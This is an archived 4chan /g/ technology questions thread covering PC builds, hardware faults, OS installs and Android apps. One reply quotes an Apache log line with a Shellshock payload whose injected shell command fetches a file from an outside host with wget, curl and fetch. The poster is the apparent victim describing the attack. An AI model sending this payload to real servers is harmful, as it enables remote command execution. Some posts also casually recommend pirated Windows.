[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y ] [Home]
4chanarchives logo
This thread was created to prevent anons from spamming new threads,
Images are sometimes not shown due to bandwidth/network limitations. Refreshing the page usually helps.

You are currently reading a thread in /g/ - Technology

Thread replies: 255
Thread images: 59
File: The Borg.jpg (74 KB, 736x446) Image search: [Google]
The Borg.jpg
74 KB, 736x446
This thread was created to prevent anons from spamming new threads, for technology questions they have.
If you are that person, post your simple/small/stupid questions here.
Don't bump. This is a slow board, and will continue to be. Wait for an answer or google it.
If you see other anons posting questions outside this thread, ignore or redirect them here.
Use >>>/g/sqt as a link to find the sqt thread.
>>
>eternal subreddits on /g/

I thought this board would be smarter.
>>
The deluge Execute plugin isn't executing shit. I made sure to chmod +x, deluge is running as root, tested the script manually. wat do
>>
>installing linux on desktop
>get through all the steps with architect
>forget that I didn't back up files from windows on my ssd
>installed linux on my ssd
how fucked am I? the files aren't "mission critical", but I would rather have them then go through the trouble of recreating them
>>
>>54658516
/sqt/ cuts down on spam sempai
it'd be nice if more people actually read the sticky instead of spamming the board with "I'm lazy and I want /g/ to spec out a gaymen peecee for my retarded ass"
>>
>>54658535
>if it's not in my subreddit it's spam
>>
>>54658498
next time you post a stupid questions thread, you should put "/sqt/ - Stupid Questions Thread" in the subject
>>
>>54658543
we even have a board for /v/irgins to spam their retarded questions >>>/wsr/
>>
>>54658498
Are you fucking retard? You are fucking forgot title you stupid question yourself
>>
>>54658591
>>54658550
My mistake; I will include it next time.
>>
File: 003.jpg (34 KB, 550x413) Image search: [Google]
003.jpg
34 KB, 550x413
Has anyone here ever built in a Lian Li case? I'm no ricer, I just want a windowless, minimal case with good cooling.
>>
>>54658783
I used to work for a computer shop and the owner would only use Lian Li cases due to them being aluminum and therefore wouldn't rust in the coastal town I live in.

I found them decent enough to work with and never had any issues with them.
>>
>>54656012
Yet 4chan is like "Please support 4chan by disabling your ad blocker on *.4chan.org/*, purchasing a self-serve ad, or buying a 4chan Pass." Yeah, so now I have to pay to not get virus? Such hypocrites. If you don't want me to use an adblocked, do not allow ads with viruses in the site.
>>
Some of my album artwork won't show up in Subsonic, it's driving me mad. Everything is tagged properly and artwork is fine. Please help.
>>
I found a working 'audiophille' PS1 at a goodwill (SCPH-1001), how am I supposed to use it just as a CD player? I'd go out and get a dedicated one, but why do that when I have this?
>>
File: 1444771634969.gif (2 MB, 285x228) Image search: [Google]
1444771634969.gif
2 MB, 285x228
Hi all.

My graphics card is about to break down, I have 2x 1gb Hd 5870's.

Is there any point in selling these cards anymore? I've heard some people use them for bit coin mining or something.

What good value GPU should I aim to buy that can run 1920x1080 at above 30fps for my replacement?

Thanks love you.
>>
What's the best books for ios programming and to make apps for apple products?
>>
>>54658913
JUST
KISS
HER
ALREADY
>>
File: Capture.png (104 KB, 1235x1237) Image search: [Google]
Capture.png
104 KB, 1235x1237
Is this a good idea? Probably won't actually get a 980ti hybrid and will wait a few months for a good non-foundry edition 1080.
>>
I'm trying to clone Windows on two partitions on my machine. I used a cloning tool to clone the source but I can't boot from it. Am I supposed to set the cloned partition as "active" in the disk manager? Or will that somehow fuck my shit up?
>>
>>54659071
not sure when haswell-ep or whatever the next enthusiast platform is will come out, but unless you need a computer right now I'd wait
>>
>>54658566
Meanwhile the /g/ wiki directs people to the SQT on its Building a PC page.

Eat shit.
>>
>>54659126
Broadwell-e is being released soon but judging from the info out right now it's not gonna be much of a difference, at least in this price range.
>>
>>54659163
aside from the 980, that build looks ok.
maybe swap the asrock board for a asus and the evo for a pro, or maybe a m.2 pro
>>
File: pc.png (158 KB, 1159x1393) Image search: [Google]
pc.png
158 KB, 1159x1393
thoughts?
>>
>>54658535
>/sqt/ cuts down on spam sempai
No, it doesn't.

People can't be bothered to use their favorite search engine to find the answer to their question. AND they can't be bothered to read the sticky. So why do you think they would search the catalog for a /general/?

Plus it is Friday evening on the east coast. That means it is primetime shitposting.
>>
File: babby-01.jpg (71 KB, 381x380) Image search: [Google]
babby-01.jpg
71 KB, 381x380
>>54659150
>Meanwhile the /g/ wiki directs people to the SQT on its Building a PC page.
Anyone can edit the wiki, sensei. So congrats on the advertising.

Enjoy your general.
>>
So I have a bit of trouble with how my dad handles his shit

He has this old computer he's used to with little old Windows XP on it, it's not connected to internet. He uses that just for a single purpose: old versions of software related to copying DVD movies and ripping music from CDs. He's too used to it. Tools like really old versions of Nero, Alcohol 120%, CloneDVD, AnyDVD and so on that aren't really compatible with something like Windows 7 for obvious reasons.

Issue is, this old PC is dying because he doesn't really treat his shit well either. And now he's annoyed at the fact that if he's going to buy a new computer he might not be able to use XP due to newer hardware being compatible only with newer versions of Windows.

I kinda want him to instead adapt to something that won't keep him there. Anything will do, Windows 7, Windows 10, any linux distro. I just don't think it's going to be worth a shit for him to go buy a specific more modern computer that he can use to dual boot into anything usable and XP alongside that.

Tell me, how can I help him beat this baby duck syndrome and maybe replace his old software with something that will be just simple enough for him to do these tasks?
>>
Anyone tried the facebook purity plugin?
I'm hesitant to install a plugin for firefox from a website that isn't owned by Mozilla

http://www.fbpurity.com
>>
>>54659225
>WD blue
Either get an HGST or a black, HDDs are cheap as fuck now
>>
>>54659332
fool what are you talking about, i come straight to these threads with my stupid questions. however most of the time i don't get an answer

>>54659379
install gentoo
>>
>>54659379
Throw his old computer away so he'll only have the new one and force him into using the new OS. 7 is close enough to XP anyway
>>
>>54659379
I have an xp vm in proxmox JUST for an old check printing program

an actual long term solution would be to do research. find updated versions + similiar software for windows 7/8.1 that matches the functionality of his xp machine

i've done similar in the past for my mom, basically "what do you need your computer to do; what programs do you absolutely 100% need" etc etc
>>
If I were to load Windows 7 on this laptop, would I face any serious problems, like driver problems and what not?

http://www.newegg.com/Product/Product.aspx?Item=N82E16834232849&nm_mc=AFC-C8Junction&cm_mmc=AFC-C8Junction-LogicalIncrements.com%20Inc-_-na-_-na-_-na&cm_sp=&AID=10440897&PID=5961731&SID=0
>>
So im looking at building my first computer
one of my main concerns is to do with the motherboard having issues fitting into the case

Is there a way to tell which cases can fit which motherboards in
>inb4 size
the website im looking to buy from dont have size measurements for the motherboards, but they do for the cases.
>>
>>54659379
doesnt 7 have something like "xp mode" meaning that it can run any xp program?
>>
>>54659628
The general rule of thumb is that an ATX will fit in any ATX case, micro will fit in micro ATX cases, etc. Some full ATX cases can also fit micros via movable stand-offs within the case. Find a mobo size you want first then search for the cases. I think that pc part picker automatically checks size for you.
>>
>>54659407
fixed for +5$, thanks!
>>
>>54659702
Good, blues are horrific
>>
hey guys I'm having difficulty running dual monitors in linux; both monitors are showing the same thing right now. They're both vga. wat do
>>
>>54659587
i looked up the drivers for the ROG-G751JY on asus's site and only found 8.1/10 drivers.
i would assume the hardware would work with windows 7 as long as youre willing to fish out all the drivers from each manufacturer's page

DQMOT though

also, removing the win10 nags and adding classic shell to 8.1 makes it an alright "botnet 10" alternative :^)
>>
>>54659742
i had the ssd there, so i just grapped wtf ever hdd i saw afterwards lol

>>54659769
DE?
>>
>>54659848
cinnamon
>>
>>54659837
In that case I may just embrace the botnet. I would rather have something that works instead of something that could fall to pieces any moment.
>>
HTML > CSS > JS > PHP > FRAMEWORKS
^
Im somewhere here

Am i doing it right?
>>
>>54659742
Are HGST's really as good as people make them out to be?
>>
>>54659899
what you'd really be "missing out on" are whatever tools asus provides for 8.1 and 10

make sure you have a way to reset back to stock 8.1 (disk, restore usb.. something), then try installing 7 to see if it works, otherwise just fall back to 8.1
>>
>>54659943
Failure rate wise? Yeah.
>>
File: cinnamon.png (29 KB, 802x520) Image search: [Google]
cinnamon.png
29 KB, 802x520
>>54659876
assuming you can get here.. does unchecking "mirror displays" not work?

if not, then i found this SO post involving xrandr, pretty sure the settings wont stick unless you mess with configs though

http://stackoverflow.com/questions/18736948/extended-desktop-in-linux
>>
>>54659899
There are many solution to purify 10 windows and remove/block telemetric and other shit on the net
actually it's nice after that
>>
>>54660005
See exactly, I have used it on a friends computer and it works very nicely like 7. I may read into purifying it and see if it can make a huge impact on the botnet.
>>
File: 20160520_193537-1.jpg (453 KB, 1716x2047) Image search: [Google]
20160520_193537-1.jpg
453 KB, 1716x2047
Ignore the shitbox, but is this a bad place to store my PC if I'm gonna be gaymen? There's some vents on the side(can kinda see in the pic) but I'm not sure if it's enough. I'm considering taking that whole wall off. I usually just keep a small fan aimed at it.
>>
>>54659938
Yes, but some database languages will also be useful when you start the PHP
>>
>>54660036
is the back of the desk open (even if it's literally an inch from the wall)?

if so, yes
if not, youre probably still fine, check temps
>>
>>54660061

SQL right?
>>
File: speks.png (18 KB, 493x388) Image search: [Google]
speks.png
18 KB, 493x388
>>54660062
Nah, there's just a hole for cables, but that wood is pretty thin so maybe I could take a saw to it and make it better. There was a door on there originally, which I thought was dumb, so I took it off. Runs hot when I play games but that's because its a piece of shit and I'm going to upgrade soon. I guess I just needed some confirmation that I wasn't fucking my shit up before I put something good in there. Thanks anon.
>>
>>54660172
yes, but for some framework dedicated to mobile app , you'll probably have to learn other database language but it will be later
>>
>>54658498
Hdmi port wont work anymore.
It use to work fine, then acted weird, now not at all.
Can linux/Xorg/nvidia actually disable the hdmi port permanently?
Ive disconnected the hdd, and also booted windows cd and hdmi wont work still.

>I usually have my tv on hdmi, and monitor on vga.
>Then only used tv on hdmi and no monitor or anything on vga
>also have dvi to hdmi adapter for use on monitor to have monitor on hdmi
>computer wouldnt post with tv on hdmi
>plug hdmi-dvi cable in on monior
>computer then posts
>switch cable back to tv
>it works, have to boot like this
>now nothing will let hdmi boot up
>have to use vga
>>
How does strtok actually works ? I don't mean how to use it, it's pretty easy, the thing is that you call the function once telling it what are the delimiters. Then you call it as many time as you want to get the strings between each delimiter. How does it remember the delimiters and where it was on your string ?
>>
>>54660274
also I noticed when I plug the hdmi cord from the monitor into the computer now, the monitor goes straight to sleep mode.
Is this some kind of protection system for something like ground on the host device isnt connected, or could it indicate that a power rail is shorted somewhere?
>>
>>54658913
Maybe a 380? 30fps @ 1080 is pretty easy nowadays, can probably run high/ultra settings if you lock your framerate to 30
>>
File: Nexus_5_(1).jpg (517 KB, 995x784) Image search: [Google]
Nexus_5_(1).jpg
517 KB, 995x784
Is it just me or did anyone else's Nexus 5 get noticeably slower over the past couple months? Not only is it slower, but doing casual browsing in Chrome makes the back of the phone turn into an inferno.
>>
>>54660778
install CM
install only the apps that you need
use Opera
>>
What are some good dual CPU server motherboards? Preferably under $400.

I plan on getting an E5-2690.
>>
>>54660829
I used CM for years and about 6 months ago I reverted back to stock. When I first switched over, it was pretty much the same experience except without some of the little CM tweaks.

Right now I'm getting some packages ready so I can go back to CM. I'm also going to install a proper adblocker because I'm thinking that maybe running some of those shitty ad scripts in Chrome is contributing to the battery killing/resource usage.

It just seems a little suspicious that it slowed down relatively recently, suddenly and rapidly. I don't really touch the Play store at all, I've been using the same apps forever.
>>
How can I reduce signal to my modem?

I moved to a different room so the cables are different. I put a splitter and I have my tv and modem connected to it. The tv works fine but the modem won't connect to comcasts servers. The modem reports levels as high as 53. I can plug directly from the wall and it will work. I tried two different splitters.
>>
This is a specific question about Plays.tv recording software.

For some reason all the sounds are fine but my voice, it's extremely quiet and i'm not sure why. I've tried all the standard stuff such as checking audio levels; and on skype my voice can be heard just fine by other people, it's just with plays.tv.

I can post example if needed.
>>
File: cringeouta10.jpg (3 MB, 1903x6472) Image search: [Google]
cringeouta10.jpg
3 MB, 1903x6472
>>54661113
Here are the logs for the modem

http://pastebin.com/7A4BySQJ
>>
File: efwefwef.png (2 MB, 1920x1080) Image search: [Google]
efwefwef.png
2 MB, 1920x1080
Anons that were lurking about this time yesterday may remember me. I had a /wsr/ thread on this topic but the thread died. I've been having random PC freezes / crashes. Clean drivers, all hardware is plugged in correctly, nothing seems physically damaged.

Somebody suggested I live-boot an OS using a USB drive because it could be a SATA problem. I haven't done that yet, because I need to go buy a new USB drive.

What I DID do however, was remove my crappy power strip, and plug straight into the wall. So far the pc has been on for about an hour with no issues. Could a cheap ass power strip / surge protector really be culprit? If say, the power was insufficient for a split second, would that cause the whole pc to lock up?
>>
>>54660836
For what purpose?
>>
>>54661307
Game servers, probably.
>>
A buddy of mine has been got into the winblows 10 trap, which update KB was it that forces it on your ass?

I googled it at first, but it told me it was 8 different ones when I distinctly recall /g/ saying it was one of them.
>>
I can't send my friend pictures via text.
Whenever I try it says no valid recipient for this MMS.
Anyone know how to fix this?
If not what's a good messaging app I could try instead? I'm using Textra now.
>>
how do i play blu-ray discs on windows 10?
>>
File: 41oNE2XwwwL.jpg (25 KB, 500x485) Image search: [Google]
41oNE2XwwwL.jpg
25 KB, 500x485
I'm sick of expensive canned air that runs out quickly and I've heard a lot of suggestions to get a Datavac. Is this little model the one to get, the bigger canister one, or is another brand similar device like Xpower Airrow or CompuCleaner better?
>>
>>54662157
I was thinking about getting one of these and have been considering it for like a decade. I have an airbrush compressor though I can blow air with and then can use a duster internally. I've used normal vacuums before with no issues too.

Overall I feel paranoid and that I should get an antistatic vac, but its never been an issue and they seem awfully expensive and not necessairly worth it.
>>
File: DataVacPro Series-MDV-1BA.jpg (343 KB, 1080x604) Image search: [Google]
DataVacPro Series-MDV-1BA.jpg
343 KB, 1080x604
>>54662157
Datavac is the standard, dunno how those other brands are. I have this one and it's been pretty good so far.
>>
Video card memory question, is it HBM2 or HMB2? I've seen both.
>>
>>54660036
Pick up that bottle cap
>>
File: 1421540618053.jpg (68 KB, 700x700) Image search: [Google]
1421540618053.jpg
68 KB, 700x700
The system cannot start because api-ms-win-crt-runtime-l1-1-0.dll can't be found on the PC. Try to reinstall the software to correct this problem.
>>
>>54662240
HBM2. High Bandwidth Memory. HMB2 is a typo at best, quite possibly illiteracy or cheapass chinese knockoff tier english.
>>
>>54662301
sounds like you should
>Try to reinstall the software to correct this problem.
or stop resisting and install gentoo
>>
>>54662202
>>54662224
Thanks guys. I guess I'm undecided between the big one and the little one. I don't really care about the suck function, I don't intend to use that inside my computer so I can use my normal hoover for that. I'd be willing to pay the ~20 bucks extra for the big one if it blows better or is more durable. But I'm kinda turned off by the extra bulk and consumable bags vs. a rinseable filter.
>>
>>54662325
It's the gamecube emulator (dolphin).
I already installed the visual c++ 2008 both 32 and 64 bits.
>>
>>54662330
Yeah, the bags are kind of a pain. Having a rinseable filter would be nice.
>>
Why is it that some youtube videos require that I have adobe flash and others don't?
Using Vivaldi.
>>
File: ss+(2016-05-20+at+10.06.56).png (19 KB, 536x421) Image search: [Google]
ss+(2016-05-20+at+10.06.56).png
19 KB, 536x421
Do I just need to upgrade my graphics card to be able to max next gen games?
>>
My phone's got a busted headphone jack and work sucks without music to keep me distracted. I'm looking into a bluetooth reciever for a cheap solution rather than buying wireless headphones since I already have several pairs of decent headphones around.

Anyone have any experience with these? As of now I was looking at http://www.amazon.com/gp/aw/d/B00P20TFWM/ref=dp_ob_neva_mobile
>>
>>54662598
Pretty much. A 770 is just a hair more powerful than a 960, so you should be getting decent performance on that already. If you really, really, really need to game to have all those sliders to the right and keep a locked 60 fps, you kinda need a gtx 980 / 1070 or r9 390x overclocked. Polaris is being announced june 1st though. Wait for that at least.

also what clock speed is that cpu running at? Did you really buy a "k" series processor and leave it stock clocks?
>>
File: ss+(2016-05-20+at+10.24.58).png (30 KB, 407x403) Image search: [Google]
ss+(2016-05-20+at+10.24.58).png
30 KB, 407x403
>>54662669
I don't get as good fps as I used to when I first got this rig. Doesn't quite run newer games at anything but lowest/barely medium. Not sure if this tells you anything I don't know anything about overclocking as I didn't want to fuck it up. But I think i'm going to dick around with overclocking my shit so I can run things again. Scared about overclocking because my pc is basically a space heater and I don't know if overclocking at these temps are safe.
>>
>>54662720
space heater? that cpu shouldn't run that hot. Not sure about the 770 if that's an inherently hot card or not. What are your temps? Are your fans properly cleaned? Has it been more than 18 months since you put on thermal paste? Does your case have good air flow?
>>
File: IMG_20160521_242250674.jpg (4 MB, 4160x3120) Image search: [Google]
IMG_20160521_242250674.jpg
4 MB, 4160x3120
So, we have a spare laptop that we want to use as a media PC, but the screen was broken, so I removed the entire display and it works to boot to an external monitor just fine.
But it still detects it's nonexistent display and outputs the splash screen and bios to the nonexistent screen.
>Is there a way to permanently disable the nonexistent display so everything gets forced to it's video output?
I need to get to the BIOS to change boot settings.
>>
>>54662754
Case has shit airflow and the everything is clogged to shit with dust. I'm going to clean it soon. Could you tell me about overclocking though?
>>
>>54662786
If your case has shit air flow, and if it's not just the fault of dust, buy a new case. You have very good mid-range parts in there, with only the gpu being a little dated.
>>
>>54662512
Nevermind. Already figured out and solved the issue.
>>
>>54662652
I've used one, BT is easy enough to use but the sound quality is ass. But if you're just using it for background noise then it might be suitable. If you want good sound quality you might be able to use a USB DAC with your phone, but you probably won't be able to charge the phone simultaneously. Which can be a problem because the DAC will drain your battery faster.

But aside from that, I think those are your only options other than fixing the jack. I've actually also done that before on an old Galaxy Nexus, and it's really not that difficult. Some phones are somewhat modular when you open them up, so you might only need to order a little board with a jack on it.
>>
>>54662795
I was going to clean it and make it look real nice but I was discouraged since i'm not really able to run anything anymore. So I thought what was even the point.
>>
>>54662817
Oh and another option would be to get a cheap portable music player and using that instead of your phone
>>
File: 1432693859944.gif (182 KB, 226x224) Image search: [Google]
1432693859944.gif
182 KB, 226x224
What should I put on my github account?
>>
How do I install xposed framework on a rooted samsung galaxy s5? which one of these is the right one? http://dl-xda.xposed.info/framework/
>>
File: IMG_20160521_005256.jpg (2 MB, 3264x2448) Image search: [Google]
IMG_20160521_005256.jpg
2 MB, 3264x2448
I've tried everything I could think if to solve this but now it's time to ask some help.

Since some months ago, when I try to connect a TV through HDMI, the TV itself (and every TV I tried) just shows "No signal". The PC does recognize that the TV is connected, but it doesn't show anything.

What can I do? It's a Toshiba laptop with Windows 10 (>inb4 botnet) 64-bits which originally came with Windows 7 32-bit and it has an Intel i3-2350M processor with Intel HD Graphics 3000.

Pic related, it's the HDMI input the laptop has.
>>
>>54658535
>sempai
There is no m in the Japanese language.
>>
>>54663083
Fn + F5? Usually laptops have a function button for switching screen outputs, press that along with the Fn key beside ALT a few times
>>
is there a pack of updates for pirated windows 7 without the telemetry?
>>
It's my fantasy to have every citizen in the United States walking around with a state of the art armor suit for ultimate self defense and to look badass.

I'm gonna make it happen, bros. When I graduate college I'm gonna go into development to make this a norm and even the standard.
>>
>>54663149
do this http://techne.alaya.net/?p=12499
>>
File: image.jpg (149 KB, 750x434) Image search: [Google]
image.jpg
149 KB, 750x434
I'm comparing http://www.corsair.com/en-us/dominator-platinum-series-64gb-4-x-16gb-ddr4-dram-3466mhz-c16-memory-kit-cmd64gx4m4b3466c16# and http://www.corsair.com/en-us/dominator-platinum-series-128gb-8-x-16gb-ddr4-dram-2800mhz-c14-memory-kit-cmd128gx4m8b2800c14#.

Why is the 64GB set listed as faster than the 128GB set?
>>
>>54663213
looking purely at those links, the 64GB run at 3466 megahertz, and the 128GB run at 2800 megahertz.... 3466 > 2800
>>
Any plex Gurus wanna help me out?

My server has been working at my friends house since forever and still works for everyone else, but now he gets this message at his house and I have no idea what's causing it. On my phone on his wifi i can connect to my server no problem, but his devices (his ps4 and his Xbone) cannot. I've never even seen this warning before.

Remote access is confirmed working. Half a dozen people still regularly using my server over the past few days. What gives?
>>
Could an owner of the updated H440 chime in about the cooling and silence? Some temps would be good.
>>
>>54663213
>64GB of RAM
>128GB of RAM
Pointless overkill.
>>
>>54662823
Unless you have 90c cpu/gpu temperatures, i have no idea why you shouldn't be able to play literally everything at high/medium settings. I have fx 8350 and gtx 960, which is technically worse than your gpu, and I'm running the new Doom at 45 fps with the default settings. Running witcher 3 60fps with a mix of high and medium settings, with ultra view distance and post-processing off.
>>
File: IMG_0036.jpg (2 MB, 4032x3024) Image search: [Google]
IMG_0036.jpg
2 MB, 4032x3024
Hello /g/, I'm giving advice to my mom about buying a new laptop for her. She is also getting input from her brother about laptops. She does daily computing for work, and doesn't play any games or anything. Basic web browsing and word processing and whatnot. We have basically gotten it down to two choices, it's between this (http://www.microcenter.com/product/461006/Aspire_E5-574-58JM_156_Laptop_Computer_-_Charcoal_Gray?ob=1) and pic related, but without a touchscreen, so it's only 799. I have been telling her to get the acer one, but her brother says that it isn't that good, and she should get the dell one. I figure the ram difference is basically nothing, and she doesn't need a blazing fast ssd. What do you guys recommend?
>>
>>54662817
Yeah the sound quality being ass isn't too big a deal to me since I'm not using very good headphones at work anyways.

I considered taking the headphone jack out of an old phone and replacing it since I figure the Galaxy line of phones probably use the same jacks but I'd rather not potentially fuck up my phone when I havent got the cash to get a new one if I do.
>>
I'm buying an expensive headset but the cord is built into the headset itself

Is there a custom wire shop or something similar that I can send it to to re-wire to use my own cords instead?
>>
Which version of daemon tools is the best? If not daemon tools, what's a free alternative to piracy of alcohol120% or poweriso?
>>
>>54658498
how do make a raspberry pi with pi hole installed into a dns cache? do i turn off the midnight history purge?
>>
>>54663557
Watch a youtube video and do it yourself
>>
>>54663629
virtual clonedrive
wincdemu

either one is better than daemon tools
>>
>>54663706
I don't trust myself with a soldering iron, I'd rather have somebody who knows what they're doing do it
>>
>>54663101
yes there is you baka

>>
>>54663454

The first thing you do when you buy pre-builts is look up any possible hardware or software problems on google.

From experience Acers are shit.

That Dell is overpriced even at 799 and not worth it for basic web and word processing.

Find something with the build quality of a thinkpad.
>>
is there a way to make Internet consummation shorter on my windows phone? I listen to songs on youtube an eats a lot of MB.
>>
>>54663753
He's probably critiquing the use of m instead of n for sempai but even that's dumb because hepburn romanization is a thing.
>>
>>54663755
Well, according to my mom weight is an issue. She's really small, so that acer at 5 pounds feels too heavy for her. The main attraction of the dell is its weight and size.
>>
>>54663822
find something cheap yet sturdy from lenovo
>>
How do I add a title to posts?
>>
I want to open password protected .7z files, but I can't seem to use the -p arguement.

It always says it's the wrong password. I think it's because it has an exclamation point in it.

How can I make 7z use the proper password?
>>
>>54661269
> Could a cheap ass power strip / surge protector really be culprit? If say, the power was insufficient for a split second, would that cause the whole pc to lock up?
Yes. It's possible.
>>
I am using an Android Tablet.
What is the best browser for 4chan that supports NSFW/hidden boards?

Clover is shit and you can't hide the massive catalog/thread navigation pane on the left side of the screen.

Chanu hasn't been updated in nearly 3/4 of a year and doesn't support newer boards added in that time.

Web browser is a battery drain and no easily available dark themes/etc.
>>
Can/are 2-in-1 modem/routers more or less effective than having a separate modem and router?
>>
>>54664127
pretty much every router has a modem in it nowadays, your ISP gives you a modem-router combo and that is required to use your internet at all.

If you want more control over your router you are usually able to put the one they give you into bridge mode and use your own store-bought router, but if you just want to use the internet stick with your ISPs bullshit
>>
>open source software is less secure because potential hackers can see exactly how to make an exploit
How do I counter this?
>>
what video and / or audio player do you use on android ?

VLC sucks too much battery on idle and is not good for watching YLYL webms because of the annoying gui
>>
>>54664315
If you understood how people 'made exploits' you would know that having the source code doesn't really help.
>>
>>54659379
Get an old PC of about the same age or slightly newer on Craigslist or wherever. Install cracked XP (easier time with drivers), or legit, of you have the time. Migrate his stuff to that.
>>
>>54659332
Primetime shitposting would be a Saturday afternoon in Australia.
>>
I want to buy new RAM but I'm unsure if it will fit in my mainboard.
How can I tell the components are compatible?

http://www.amazon.de/Corsair-CML16GX3M2A1600C10-Vengeance-Profile-Performance/dp/B007TG8QRW/ref=sr_1_2?s=computers&ie=UTF8&qid=1463820626&sr=1-2&keywords=corsair+vengeance+low+profile
http://www.amazon.de/Corsair-CML16GX3M2A1600C9-Vengeance-Profile-Performance/dp/B009YOJZ5E/ref=sr_1_9?s=computers&ie=UTF8&qid=1463820626&sr=1-9&keywords=corsair+vengeance+low+profile
http://www.amazon.de/Corsair-CML16GX3M2A1866C10-Vengeance-Profile-Performance/dp/B00B144EDS/ref=sr_1_12?s=computers&ie=UTF8&qid=1463820626&sr=1-12&keywords=corsair+vengeance+low+profile
These are the ones I put my eyes on and would simply go for the one with the lowest price. Any reason not to?
>>
File: i16n5WrzhEiWN.gif (2 MB, 431x637) Image search: [Google]
i16n5WrzhEiWN.gif
2 MB, 431x637
What chat software can I use for no botnet both on Android and Desktop?

Whatsapp has encryption but it's owned by Facebook and Telegram is a meme.

Is there any chat software without centralized servers and end to end encryption?
>>
>>54658498
which one is locutus?
>>
File: Cuckuri2.png (16 KB, 148x204) Image search: [Google]
Cuckuri2.png
16 KB, 148x204
Are mechanical keyboards actually worth it?
I've never touched one since they're always packaged my only tech friends live too far away but I've been considering getting one
>>
>>54663130
I already tried that, but the TV screen stills says "No signal". Any other thing?
>>
>>54664614
Any XMPP client
>>
>>54658913
you should wait for the new line up of amd to come out
>>
Is there an easy way to transition files from Windows onto a new hard drive?

I hate the problem of going through my system and trying to find everything but I also don't want to copy the whole shebang.

I want to get a larger/faster SSD but don't want to mirror this one.

Any suggestions?
>>
>>54664855
make sure it's actually plugged in on both ends, check that your hdmi cord isn't damaged (use another one see if that works)

right click on your desktop > screen resolution, make sure it is showing up there as a second screen and enable it if it isn't
>>
If I create a linux VM and tunnel my browser traffic through SSH through it, would it be the same as tunneling through a remote server?
>>
I think someone, apparently an engineering company in Thailand is possibly trying to exploit my webserver.

This is from Apache access logs.
203.147.62.80 - - [21/May/2016:05:03:02 -0400] "GET / HTTP/1.1" 200 288 "-" "() { :; }; /bin/sh -c 'wget http://redlug.com/pdf/IWD1990.docx -O /dev/null;wget1 http://redlug.com/pdf/IWD1990.docx -O /dev/null;curl http://redlug.com/pdf/IWD1990.docx -o /dev/null;/usr/sfwbin/wget http://redlug.com/pdf/IWD1990.docx;fetch -/dev/null http://redlug.com/pdf/IWD1990.docx'"
>>
>>54665053
Security wise I mean
>>
> having classism in a borg cube

good one
>>
File: IMG_20160521_005242.jpg (1 MB, 3264x2448) Image search: [Google]
IMG_20160521_005242.jpg
1 MB, 3264x2448
>>54665016
It is connected on both sides and it's not damaged because it works with another laptop and a PS3.

The PC does recognizes there's a TV connected through HDMI, it does says it's enabled, it even says all the information from the monitor (like the brand, model and other stuff) but still gives no signal through HDMI, although it detects something is transmitting.
>>
>>54664315
as said, with the source or not, if they want to exploit it will be the same.
Just learn how to program properly. Make something easy to read, commented, maintainable, avoid using unsecured things (for example, avoid using a scanf that will permit a buffer overflow attack).
>>
>>54662916
your projects and things you're working on. I also put my vimrc and some config files I want to keep somewhere.
>>
Do blu-rays cost more to mass produce than DVDs?

Not talking so much about blanks or whatever but like if you're selling a movie or something.
>>
>>54664693
Here comes the HHKB meme squad.
>>
>>54664693
Eh... Depends on how you define "worth it" really. I own one myself but I'd never really tell someone that it's something they absolutely must get. It's just kind of a luxury upgrade for a part of the computer that gets a hell of a lot of interaction with the user, if you have the cash to spare and nothing else you really need to upgrade then it might be nice for a minor quality-of-life improvement. Otherwise, if there's pretty much any other part of your rig that you think could use upgrading, I'd say do that first.
>>
File: Samsung-ATIV-Tab-3.jpg (512 KB, 1600x1200) Image search: [Google]
Samsung-ATIV-Tab-3.jpg
512 KB, 1600x1200
So I have a shitty, shitty tablet that works well only with Windows 8 as I experienced. Updating to 8.1 or 10 makes it slow and clunky as shit. I am now returning to that system because I have no other option. Linux just doesn't like this tablet either.

However there's something heavily concerning: the moment I connect it to internet, aside from being of course exposed to shit because it's no longer being updated, it will probably try to force windows 8.1 into it. Any way to prevent that specific update? I recall that when 8.1 came out, I had to actually download the update manually from the store, but I would guess now it's going to just show up on Windows update.

Does anyone know what I should prevent specifically? I won't be connecting it to internet much because I'm probably at not much less risk than using fucking XP and from what I understand the tools I require work just fine on 8 as they did on 7 or 8.1.

It's just this fucking piece of trash tablet that I wish to throw but I don't throw gifts.
>>
>>54665821
Does that happen on tablets? Yeah, on desktops Microsoft will ratfuck you when you least expect it and sneak an upgrade in, but I'd think they'd know that tablets are a different thing and compatibility can be an issue so they shouldn't try to force upgrades on the user.
>>
>>54665850
I would guess so. Windows 8 doesn't have any more updates as I understand it, so they probably tried hard to have the latest ones try to upgrade the whole system.

I mean I can understand it for most people, 8.1 was an improvement on any computer I put my hands on, just not this one and I know not what the fuck is going on with that.
>>
What do you guys use for monitoring apache server traffic and getting statistics from logs?

Personally, I monitor current traffic by good old
tail -f access.log | grep <shit I need>
. Is there a more efficient way?

As for the stats, do I just untar all access.log* files, cat them and pipe that to grep, sed or whatever? Or is there a good command-line tool for doing this?
>>
Does brand of thermal paste matter? Is there anything I should look out for, or are they all pretty much the same?
>>
File: Capture.png (25 KB, 979x514) Image search: [Google]
Capture.png
25 KB, 979x514
I have an extremely bizarre issue. Doubt anyone will have an answer but it's really pissing me off.

A few days ago, youtube-dl stopped working. When I try to run it, nothing happens. Basically the CMD window freezes. Pic related is what I get when I cancel the command with ctrl+C.

Now, the weird part is that when I go to the actual youtube-dl.exe file in explorer and right click it, the context menu takes about 10 seconds to open. Doesn't happen with any other files, even those in the same folder.

And this is where it gets really abnormal: if I go to my secondary hard drive where I have a backup of all my files and right click on youtube-dl.exe there, the same context menu delay occurs. Again no other files, even those in the same folder as youtube-dl.exe, suffer this 10 second context menu delay.

What the utter fuck is going on? This is such a strange issue that I don't have even the slightest idea what's going on. Is Microsoft working in cahootz with Google to block the program discretely on Windows 10 or something?
>>
>>54666146
Difference is usually pretty small, 1-2 C unless you use the electrically conductive shit which brings it down 3-5 C.
>>
>>54666345
Alright, thanks
>>
With a GTX 970 and an i5 is 8gb of ram good enough? I have a Vive coming in July and was considering upgrading to 16gb.
>>
>>54666395
If you have to ask, 8gb is enough
>>
>>54666408
Thanks man. Hopefully this build will last me for another 3 or 4 years.
>>
File: screen-capture.png (38 KB, 640x161) Image search: [Google]
screen-capture.png
